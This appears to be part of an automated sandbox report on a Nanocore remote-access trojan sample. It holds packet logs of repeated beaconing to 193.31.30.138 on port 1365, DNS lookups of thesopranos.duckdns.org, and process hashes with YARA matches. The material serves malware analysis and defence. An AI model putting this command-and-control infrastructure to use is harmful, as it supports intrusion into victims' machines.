                  Feb 3, 2023 23:17:13.025103092 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:13.108916044 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:13.899013042 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:13.983618021 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:14.041382074 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:14.048016071 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:14.072346926 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:14.072841883 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:14.214699984 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:14.296273947 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:14.296542883 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:14.327982903 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:14.462419033 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:14.493355989 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:14.508224010 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:14.593128920 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:14.626943111 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:14.718144894 CET136549691193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:15.196192980 CET496911365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:23.474432945 CET496931365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:23.505230904 CET136549693193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:23.505343914 CET496931365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:23.506232977 CET496931365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:23.542490005 CET136549693193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:23.542807102 CET496931365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:23.573703051 CET136549693193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:23.679440975 CET496931365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:23.764792919 CET136549693193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:23.828550100 CET136549693193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:23.844055891 CET496931365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:23.874605894 CET136549693193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:23.875694036 CET496931365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:23.906527042 CET136549693193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:23.906620979 CET496931365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:23.937545061 CET136549693193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:23.986423969 CET496931365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:24.077295065 CET136549693193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:24.473256111 CET496931365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:24.561773062 CET136549693193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:25.471864939 CET496931365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:25.515288115 CET136549693193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:25.603975058 CET496931365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:26.472551107 CET496931365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:30.664068937 CET497021365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:30.694941998 CET136549702193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:30.695168972 CET497021365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:30.695774078 CET497021365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:30.731632948 CET136549702193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:30.731945992 CET497021365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:30.762990952 CET136549702193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:30.771605015 CET497021365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:30.858551025 CET136549702193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:30.922293901 CET136549702193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:30.923228025 CET497021365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:30.954097033 CET136549702193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:30.964179993 CET497021365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:30.995512962 CET136549702193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:30.995708942 CET497021365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:31.027077913 CET136549702193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:31.027316093 CET497021365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:31.108968973 CET136549702193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:31.551378965 CET497021365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:31.640111923 CET136549702193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:32.574212074 CET497021365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:32.655330896 CET136549702193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:33.608989954 CET136549702193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:33.639949083 CET497021365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:37.704462051 CET497121365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:37.735193968 CET136549712193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:37.735375881 CET497121365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:37.736202955 CET497121365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:37.770875931 CET136549712193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:37.771277905 CET497121365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:37.802202940 CET136549712193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:37.811553001 CET497121365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:37.889902115 CET136549712193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:37.953437090 CET136549712193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:37.954472065 CET497121365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:37.985214949 CET136549712193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:37.987015963 CET497121365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:38.017812014 CET136549712193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:38.017901897 CET497121365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:38.048765898 CET136549712193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:38.078336000 CET497121365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:38.171068907 CET136549712193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:38.734317064 CET497121365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:38.811682940 CET136549712193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:40.364031076 CET497121365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:40.452577114 CET136549712193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:41.588165045 CET497121365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:45.722404957 CET497131365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:45.753310919 CET136549713193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:45.753421068 CET497131365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:45.754062891 CET497131365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:45.789381027 CET136549713193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:45.789675951 CET497131365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:45.820763111 CET136549713193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:45.835639954 CET497131365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:45.921241999 CET136549713193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:46.047410011 CET136549713193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:46.048440933 CET497131365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:46.080187082 CET136549713193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:46.081259966 CET497131365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:46.112421989 CET136549713193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:46.112509966 CET497131365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:46.143465996 CET136549713193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:46.143558979 CET497131365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:46.234730005 CET136549713193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:46.673206091 CET497131365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:46.749322891 CET136549713193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:47.669262886 CET497131365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:51.832262039 CET497141365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:51.862932920 CET136549714193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:51.863261938 CET497141365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:51.864088058 CET497141365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:51.899614096 CET136549714193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:51.900408030 CET497141365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:51.931592941 CET136549714193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:51.939054012 CET497141365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:52.030397892 CET136549714193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:52.095037937 CET136549714193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:52.096143007 CET497141365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:52.126828909 CET136549714193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:52.168745041 CET497141365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:52.221298933 CET136549714193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:52.261317968 CET497141365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:52.291979074 CET136549714193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:52.299734116 CET497141365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:52.330841064 CET136549714193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:52.330936909 CET497141365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:52.364192009 CET136549714193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:52.418757915 CET497141365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:52.672538996 CET497141365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:52.752718925 CET136549714193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:53.669626951 CET497141365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:53.749319077 CET136549714193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:54.669730902 CET497141365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:59.287936926 CET497151365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:59.318912983 CET136549715193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:59.319156885 CET497151365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:59.354826927 CET497151365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:59.391056061 CET136549715193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:59.435663939 CET497151365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:59.457940102 CET497151365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:59.488989115 CET136549715193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:59.498512983 CET497151365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:59.593122005 CET136549715193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:59.641175985 CET136549715193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:59.663234949 CET497151365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:17:59.694561958 CET136549715193.31.30.138192.168.2.4
                  Feb 3, 2023 23:17:59.747509956 CET497151365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:00.421400070 CET497151365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:00.452483892 CET136549715193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:00.452836037 CET497151365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:00.483855009 CET136549715193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:00.536237001 CET497151365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:00.608566046 CET136549715193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:00.758054972 CET497151365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:00.842928886 CET136549715193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:01.525115967 CET497151365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:01.608545065 CET136549715193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:02.514039993 CET497151365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:06.582232952 CET497161365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:06.614238024 CET136549716193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:06.619580984 CET497161365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:06.620157003 CET497161365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:06.657630920 CET136549716193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:06.658041000 CET497161365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:06.689542055 CET136549716193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:06.711689949 CET497161365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:06.796215057 CET136549716193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:06.860225916 CET136549716193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:06.861282110 CET497161365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:06.894239902 CET136549716193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:06.895088911 CET497161365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:06.928034067 CET136549716193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:06.928245068 CET497161365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:06.961631060 CET136549716193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:07.013827085 CET497161365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:07.532552958 CET497161365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:07.608546972 CET136549716193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:08.519956112 CET497161365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:12.594580889 CET497171365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:12.625509977 CET136549717193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:12.625696898 CET497171365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:12.626415968 CET497171365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:12.661308050 CET136549717193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:12.662412882 CET497171365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:12.693296909 CET136549717193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:12.730144978 CET497171365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:12.811677933 CET136549717193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:12.875843048 CET136549717193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:12.879097939 CET497171365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:12.909833908 CET136549717193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:12.911885977 CET497171365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:12.942910910 CET136549717193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:12.946409941 CET497171365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:12.977274895 CET136549717193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:12.978333950 CET497171365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:13.061753035 CET136549717193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:13.577404022 CET497171365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:13.670973063 CET136549717193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:14.156054020 CET136549717193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:14.201972008 CET497171365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:14.591089964 CET497171365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:18.794446945 CET497181365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:18.827215910 CET136549718193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:18.827488899 CET497181365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:18.933104992 CET497181365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:18.970664024 CET136549718193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:19.186690092 CET497181365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:20.071887016 CET497181365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:20.104005098 CET136549718193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:20.104263067 CET497181365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:20.186934948 CET136549718193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:20.271121979 CET497181365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:20.358829975 CET136549718193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:20.364998102 CET497181365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:20.422521114 CET136549718193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:20.473634958 CET497181365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:20.504582882 CET136549718193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:20.506016016 CET497181365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:20.537012100 CET136549718193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:20.537158012 CET497181365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:20.568135977 CET136549718193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:20.693948984 CET497181365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:20.780710936 CET136549718193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:21.376630068 CET497181365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:21.467959881 CET136549718193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:22.281213045 CET136549718193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:22.391727924 CET497181365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:26.484383106 CET497201365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:26.515193939 CET136549720193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:26.515583992 CET497201365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:26.516681910 CET497201365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:26.551714897 CET136549720193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:26.556384087 CET497201365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:26.587482929 CET136549720193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:26.610575914 CET497201365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:26.703020096 CET136549720193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:26.766103029 CET136549720193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:26.767132044 CET497201365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:26.799381971 CET136549720193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:26.800628901 CET497201365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:26.831604004 CET136549720193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:26.831828117 CET497201365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:26.862934113 CET136549720193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:26.863217115 CET497201365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:26.952636957 CET136549720193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:27.458779097 CET497201365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:27.546145916 CET136549720193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:28.444644928 CET497201365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:32.505652905 CET497211365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:32.536283016 CET136549721193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:32.541919947 CET497211365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:32.542335033 CET497211365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:32.577688932 CET136549721193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:32.578668118 CET497211365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:32.609791040 CET136549721193.31.30.138192.168.2.4
                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                  Feb 3, 2023 23:17:12.182507992 CET | 192.168.2.4 | 8.8.8.8 | 0x82cc | Standard query (0) | thesopranos.duckdns.org | A (IP address) | IN (0x0001) | false
                  Feb 3, 2023 23:17:23.454297066 CET | 192.168.2.4 | 8.8.8.8 | 0xe8d3 | Standard query (0) | thesopranos.duckdns.org | A (IP address) | IN (0x0001) | false
                  Feb 3, 2023 23:17:30.550218105 CET | 192.168.2.4 | 8.8.8.8 | 0x3e21 | Standard query (0) | thesopranos.duckdns.org | A (IP address) | IN (0x0001) | false
                  Feb 3, 2023 23:17:37.685573101 CET | 192.168.2.4 | 8.8.8.8 | 0x16d7 | Standard query (0) | thesopranos.duckdns.org | A (IP address) | IN (0x0001) | false
                  Feb 3, 2023 23:17:45.607497931 CET | 192.168.2.4 | 8.8.8.8 | 0x2ba3 | Standard query (0) | thesopranos.duckdns.org | A (IP address) | IN (0x0001) | false
                  Feb 3, 2023 23:17:51.722161055 CET | 192.168.2.4 | 8.8.8.8 | 0xec96 | Standard query (0) | thesopranos.duckdns.org | A (IP address) | IN (0x0001) | false
                  Feb 3, 2023 23:17:59.174943924 CET | 192.168.2.4 | 8.8.8.8 | 0xc842 | Standard query (0) | thesopranos.duckdns.org | A (IP address) | IN (0x0001) | false
                  Feb 3, 2023 23:18:06.551378012 CET | 192.168.2.4 | 8.8.8.8 | 0x8297 | Standard query (0) | thesopranos.duckdns.org | A (IP address) | IN (0x0001) | false
                  Feb 3, 2023 23:18:12.558892965 CET | 192.168.2.4 | 8.8.8.8 | 0xcf26 | Standard query (0) | thesopranos.duckdns.org | A (IP address) | IN (0x0001) | false
                  Feb 3, 2023 23:18:18.683300018 CET | 192.168.2.4 | 8.8.8.8 | 0x61ec | Standard query (0) | thesopranos.duckdns.org | A (IP address) | IN (0x0001) | false
                  Feb 3, 2023 23:18:26.458391905 CET | 192.168.2.4 | 8.8.8.8 | 0x78b2 | Standard query (0) | thesopranos.duckdns.org | A (IP address) | IN (0x0001) | false
                  Feb 3, 2023 23:18:32.484534025 CET | 192.168.2.4 | 8.8.8.8 | 0xb12b | Standard query (0) | thesopranos.duckdns.org | A (IP address) | IN (0x0001) | false
                  Feb 3, 2023 23:18:39.776468992 CET | 192.168.2.4 | 8.8.8.8 | 0x4a72 | Standard query (0) | thesopranos.duckdns.org | A (IP address) | IN (0x0001) | false
                  Feb 3, 2023 23:18:46.066214085 CET | 192.168.2.4 | 8.8.8.8 | 0xc722 | Standard query (0) | thesopranos.duckdns.org | A (IP address) | IN (0x0001) | false
                  Feb 3, 2023 23:18:52.083476067 CET | 192.168.2.4 | 8.8.8.8 | 0xfba4 | Standard query (0) | thesopranos.duckdns.org | A (IP address) | IN (0x0001) | false
                  Feb 3, 2023 23:18:58.731571913 CET | 192.168.2.4 | 8.8.8.8 | 0x5fcb | Standard query (0) | thesopranos.duckdns.org | A (IP address) | IN (0x0001) | false
                  Feb 3, 2023 23:19:04.980493069 CET | 192.168.2.4 | 8.8.8.8 | 0xc980 | Standard query (0) | thesopranos.duckdns.org | A (IP address) | IN (0x0001) | false
                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                  Feb 3, 2023 23:17:12.291882038 CET | 8.8.8.8 | 192.168.2.4 | 0x82cc | No error (0) | thesopranos.duckdns.org |  | 193.31.30.138 | A (IP address) | IN (0x0001) | false
                  Feb 3, 2023 23:17:23.471971989 CET | 8.8.8.8 | 192.168.2.4 | 0xe8d3 | No error (0) | thesopranos.duckdns.org |  | 193.31.30.138 | A (IP address) | IN (0x0001) | false
                  Feb 3, 2023 23:17:30.658106089 CET | 8.8.8.8 | 192.168.2.4 | 0x3e21 | No error (0) | thesopranos.duckdns.org |  | 193.31.30.138 | A (IP address) | IN (0x0001) | false
                  Feb 3, 2023 23:17:37.703191042 CET | 8.8.8.8 | 192.168.2.4 | 0x16d7 | No error (0) | thesopranos.duckdns.org |  | 193.31.30.138 | A (IP address) | IN (0x0001) | false
                  Feb 3, 2023 23:17:45.716548920 CET | 8.8.8.8 | 192.168.2.4 | 0x2ba3 | No error (0) | thesopranos.duckdns.org |  | 193.31.30.138 | A (IP address) | IN (0x0001) | false
                  Feb 3, 2023 23:17:51.830809116 CET | 8.8.8.8 | 192.168.2.4 | 0xec96 | No error (0) | thesopranos.duckdns.org |  | 193.31.30.138 | A (IP address) | IN (0x0001) | false
                  Feb 3, 2023 23:17:59.283678055 CET | 8.8.8.8 | 192.168.2.4 | 0xc842 | No error (0) | thesopranos.duckdns.org |  | 193.31.30.138 | A (IP address) | IN (0x0001) | false
                  Feb 3, 2023 23:18:06.569550037 CET | 8.8.8.8 | 192.168.2.4 | 0x8297 | No error (0) | thesopranos.duckdns.org |  | 193.31.30.138 | A (IP address) | IN (0x0001) | false
                  Feb 3, 2023 23:18:12.576698065 CET | 8.8.8.8 | 192.168.2.4 | 0xcf26 | No error (0) | thesopranos.duckdns.org |  | 193.31.30.138 | A (IP address) | IN (0x0001) | false
                  Feb 3, 2023 23:18:18.792500019 CET | 8.8.8.8 | 192.168.2.4 | 0x61ec | No error (0) | thesopranos.duckdns.org |  | 193.31.30.138 | A (IP address) | IN (0x0001) | false
                  Feb 3, 2023 23:18:26.478123903 CET | 8.8.8.8 | 192.168.2.4 | 0x78b2 | No error (0) | thesopranos.duckdns.org |  | 193.31.30.138 | A (IP address) | IN (0x0001) | false
                  Feb 3, 2023 23:18:32.502001047 CET | 8.8.8.8 | 192.168.2.4 | 0xb12b | No error (0) | thesopranos.duckdns.org |  | 193.31.30.138 | A (IP address) | IN (0x0001) | false
                  Feb 3, 2023 23:18:39.884972095 CET | 8.8.8.8 | 192.168.2.4 | 0x4a72 | No error (0) | thesopranos.duckdns.org |  | 193.31.30.138 | A (IP address) | IN (0x0001) | false
                  Feb 3, 2023 23:18:46.175755024 CET | 8.8.8.8 | 192.168.2.4 | 0xc722 | No error (0) | thesopranos.duckdns.org |  | 193.31.30.138 | A (IP address) | IN (0x0001) | false
                  Feb 3, 2023 23:18:52.192724943 CET | 8.8.8.8 | 192.168.2.4 | 0xfba4 | No error (0) | thesopranos.duckdns.org |  | 193.31.30.138 | A (IP address) | IN (0x0001) | false
                  Feb 3, 2023 23:18:58.748497009 CET | 8.8.8.8 | 192.168.2.4 | 0x5fcb | No error (0) | thesopranos.duckdns.org |  | 193.31.30.138 | A (IP address) | IN (0x0001) | false
                  Feb 3, 2023 23:19:05.089649916 CET | 8.8.8.8 | 192.168.2.4 | 0xc980 | No error (0) | thesopranos.duckdns.org |  | 193.31.30.138 | A (IP address) | IN (0x0001) | false


                  Target ID: 0
                  Start time: 23:17:04
                  Start date: 03/02/2023
                  Path: C:\Users\user\Desktop\PhviZrlpkW.exe
                  Wow64 process (32bit): true
                  Commandline: C:\Users\user\Desktop\PhviZrlpkW.exe
                  Imagebase: 0x400000
                  File size: 775369 bytes
                  MD5 hash: 565044691FEDB39980CB814DC26F9EBD
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Reputation: low

                  Target ID: 1
                  Start time: 23:17:04
                  Start date: 03/02/2023
                  Path: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe
                  Wow64 process (32bit): true
                  Commandline: "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo
                  Imagebase: 0x280000
                  File size: 82432 bytes
                  MD5 hash: 64F982758878F6A97ED4B3D99CFBD371
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Yara matches:
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.309024218.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.309024218.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
